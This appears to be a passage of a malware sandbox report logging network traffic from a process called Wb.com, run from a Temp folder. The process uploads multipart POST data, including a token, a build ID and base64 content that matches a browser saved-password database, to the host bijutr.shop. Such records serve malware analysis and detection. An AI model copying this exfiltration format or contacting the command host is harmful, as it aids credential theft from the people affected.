                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:50 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:50 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:50 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:50 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:50 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:50 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:50 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:50 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:52 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 16:14:52 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                      Connection: close


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                      17192.168.2.649841188.245.216.2054432744C:\Users\user\AppData\Local\Temp\623615\Wb.com
                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:52 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----DT0R1DB1NYCBIMYUKF3W
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                      Host: bijutr.shop
                                                                                                                                                                                                                                                                                                      Content-Length: 55081
                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:52 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 44 54 30 52 31 44 42 31 4e 59 43 42 49 4d 59 55 4b 46 33 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 36 65 32 32 65 66 39 63 35 37 35 34 65 63 66 38 32 31 31 39 33 36 65 64 31 33 62 64 38 37 30 0d 0a 2d 2d 2d 2d 2d 2d 44 54 30 52 31 44 42 31 4e 59 43 42 49 4d 59 55 4b 46 33 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 44 54 30 52 31 44 42 31 4e 59 43 42 49 4d 59 55 4b 46 33 57 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                      Data Ascii: ------DT0R1DB1NYCBIMYUKF3WContent-Disposition: form-data; name="token"a6e22ef9c5754ecf8211936ed13bd870------DT0R1DB1NYCBIMYUKF3WContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------DT0R1DB1NYCBIMYUKF3WCont
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:52 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:52 UTC16355OUTData Raw: 32 68 68 63 6d 6c 75 5a 31 39 75 62 33 52 70 5a 6d 6c 6a 59 58 52 70 62 32 35 66 5a 47 6c 7a 63 47 78 68 65 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 72 5a 58 6c 6a 61 47 46 70 62 6c 39 70 5a 47 56 75 64 47 6c 6d 61 57 56 79 49 45 4a 4d 54 30 49 73 49 46 56 4f 53 56 46 56 52 53 41 6f 62 33 4a 70 5a 32 6c 75 58 33 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 5a 57 78 6c 62 57 56 75 64 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 64 6d 46 73 64 57 55 73 49 48 42 68 63 33 4e 33 62 33 4a 6b 58 32 56 73 5a 57 31 6c 62 6e 51 73 49 48 4e 70 5a 32 35 76 62 6c 39 79 5a 57 46 73 62 53 6b 70 42 2f 67 41 4c 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                      Data Ascii: 2hhcmluZ19ub3RpZmljYXRpb25fZGlzcGxheWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBrZXljaGFpbl9pZGVudGlmaWVyIEJMT0IsIFVOSVFVRSAob3JpZ2luX3VybCwgdXNlcm5hbWVfZWxlbWVudCwgdXNlcm5hbWVfdmFsdWUsIHBhc3N3b3JkX2VsZW1lbnQsIHNpZ25vbl9yZWFsbSkpB/gALQAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:52 UTC6016OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:54 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 16:14:54 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:54 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                      Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                      18192.168.2.649847188.245.216.2054432744C:\Users\user\AppData\Local\Temp\623615\Wb.com
                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:54 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----E37YCBIEU37YUA1689HV
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                      Host: bijutr.shop
                                                                                                                                                                                                                                                                                                      Content-Length: 142457
                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:54 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 45 33 37 59 43 42 49 45 55 33 37 59 55 41 31 36 38 39 48 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 36 65 32 32 65 66 39 63 35 37 35 34 65 63 66 38 32 31 31 39 33 36 65 64 31 33 62 64 38 37 30 0d 0a 2d 2d 2d 2d 2d 2d 45 33 37 59 43 42 49 45 55 33 37 59 55 41 31 36 38 39 48 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 45 33 37 59 43 42 49 45 55 33 37 59 55 41 31 36 38 39 48 56 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                      Data Ascii: ------E37YCBIEU37YUA1689HVContent-Disposition: form-data; name="token"a6e22ef9c5754ecf8211936ed13bd870------E37YCBIEU37YUA1689HVContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------E37YCBIEU37YUA1689HVCont
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:54 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:54 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:54 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
